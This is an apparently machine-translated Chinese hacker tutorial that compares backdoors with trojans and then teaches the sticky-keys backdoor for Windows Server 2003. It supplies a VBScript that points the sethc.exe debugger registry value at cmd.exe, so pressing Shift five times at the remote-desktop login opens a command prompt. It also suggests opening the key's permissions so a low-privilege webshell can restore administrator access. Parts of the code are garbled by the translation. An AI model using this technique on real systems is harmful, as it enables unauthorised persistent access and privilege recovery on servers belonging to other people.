今日头条黑客词典：后门和木马有什么区别？我认为严格意义上没有区别，但有细微的差别。首先要讨论一个微妙的区别。这两个字早晚会说出来。老一辈的黑客不屑于侵入个人机器（当时个人机器的网速太慢），认为服务器才是黑客挑战的极限。新一代黑客却有着完全相反的观点。有针对性的个人计算机入侵是最大的困难（现在你知道，经济利益是第一位的）。当然，按照惯例，安装在服务器上的木马就被认为是后门，安装在个人机器上的后门就被认为是木马。你明白绕路吗？简而言之，在服务器上维护权限可以称为后门，在个人机器上维护权限可以称为木马。本节我要讲的是今天开放3389端口的win2003服务器中最流行的粘滞键后门。

什么是粘滞键？在win2003系统的3389端口登录界面中，如果连续按5次shift键，就会出现如下图所示的界面。

在注册表中，5个shif键对应c:/windows/system32下的sethc.exe。具体注册表键值为：

HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows NT/CurrentVersion/图像文件执行选项/sethc.exe

如果我们把sethc.exe改成另一个exe，就像你的木马一样，它自然就会成为后门。说到这里，看来后门比木马还要高级一点。事实上，事实并非如此。再补充第二个细微的区别，应该说后门随时为你留下一扇门，让你随时可以安装木马。如果我们把这个注册表键改成另一个exe，黑客界的专业术语就是图像劫持，我们的粘滞键后门就会被保留。

当然，也可以手动更改。我写了一个简单的VBS，也可以改变。代码如下：

设置WshShell=WScript.CreateObject('WScript.Shell')

WshShell.RegWrite 'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\debugger',WScript.CreateObject('WScript.shell').ExpandEnvironmentStrings('%SystemRoot%')'\system32\ cmd.exe','REG_SZ'

我们将上面的代码保存为1.vbs，双击运行，或者从命令行运行cscript 1.vbs。

下次我们使用mstsc登录这台2003年的服务器时，如果我们按5次shift键会是什么结果呢？将弹出cmd命令行界面。

在这种情况下，我家的门总是开着的。

一般的黑客教程写到这里都会沾沾自喜。事实上，后门并不完美。我们来检查一下注册表。

HKLM/SOFTWARE/Microsoft/Windows NT/CurrentVersion/图像文件执行选项/sethc.exe/debugger

权限。

您会发现只有管理员及以上级别才能更改此注册表项。我们是否可以为每个人添加另一个权限，以便即使是最低的权限也可以更改注册表项值？当然。修改后有什么用呢？假设您的后门被发现，并且您仍然拥有Webshell。你可以在Webshell权限下添加Sticky Key后门，你的管理员权限又回来了。